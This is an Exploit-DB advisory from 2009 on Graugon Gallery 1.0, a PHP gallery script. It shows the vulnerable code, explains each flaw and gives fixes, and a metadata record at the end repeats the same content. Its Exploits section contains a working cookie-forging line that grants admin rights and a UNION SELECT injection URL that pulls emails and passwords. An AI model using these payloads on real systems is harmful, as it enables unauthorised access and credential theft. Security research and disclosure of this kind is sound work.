ID EDB-ID:8040
Type exploitdb
Reporter x0r
Modified 2009-02-11T00:00:00
Description
Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities. Webapps exploit for php platform
#########################################################################################
[0x01] Information:
Name : Graugon Gallery 1.0
Download : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability : SQL Injection / Insecure Cookie Handling / XSS
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
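Bugged file is /[path]/admin.php
The admin flag is a plain client-side cookie (g_admin=1) with no signature or server-side session behind it, so any check that trusts the cookie can be satisfied by a value the client sets itself. Fix: keep the authenticated state in a server-side session and treat the cookie as untrusted input.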
[Code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]
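Bugged file is /[path]/view.php
$_GET['id'] goes unquoted and unvalidated into the query string (SQL injection). Fix: cast id to an integer or bind it through a mysqli/PDO prepared statement; mysql_query() itself was removed in PHP 7.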
[Code]
$id = $_GET['id'];
...
$query = "SELECT * FROM g_gallery WHERE id=$id";
$result = mysql_query($query);
[/code]
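The same id parameter is also echoed into a single-quoted HTML attribute without encoding (XSS). Fix: pass it through htmlspecialchars($id, ENT_QUOTES) on output, or cast id to an integer before use.
[Code]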
$id = $_GET['id'];
echo "....<a href='view.php?id=" . $id . "'> "
[/code]
#########################################################################################
[0x03] Exploits:
Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
2- http://victim.it/view.php?id=-1337 union select
0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
( change number of columns)
3- ?id=[XSSCODE]
########################################################################################
# milw0rm.com [2009-02-11]
{"id": "EDB-ID:8040", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Graugon Gallery 1.0 XSS/SQL/Cookie Bypass Remote Vulnerabilities", "description": "Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities. Webapps exploit for php platform", "published": "2009-02-11T00:00:00", "modified": "2009-02-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8040/", "reporter": "x0r", "references": [], "cvelist": [], "lastseen": "2016-02-01T04:37:16", "viewCount": 8, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-01T04:37:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T04:37:16", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/8040/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : Graugon Gallery 1.0\nDownload : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1\nVulnerability : Sql Injection/ Insecure Cookie Handling/XSS\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/admin.php\n\n[Code]\n$TwoMonths = 60 * 60 * 24 * 60 + time(); \nsetcookie(g_admin, 1, $TwoMonths);\n[/code]\n\nBugged file is /[path]/view.php\n\n[Code]\n\n$id = $_GET['id'];\n...\n\n$query = \"SELECT * FROM g_gallery WHERE id=$id\";\n$result = mysql_query($query);\n[/code]\n\n[Code]\n\n$id = $_GET['id'];\n\necho \"....<a href='view.php?id=\" . $id . 
\"'> \"\n\n[/code]\n\n\n#########################################################################################\n[0x03] Exploits:\n\nExploit: 1- javascript:document.cookie =\"g_admin=1; path=/\"\n 2- http://victim.it/view.php?id=-1337 union select\n0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--\n\t\t ( change number of columns)\n\t\t 3- ?id=[XSSCODE]\n\n########################################################################################\n\n# milw0rm.com [2009-02-11]\n", "osvdbidlist": ["52047", "52046"]}
{}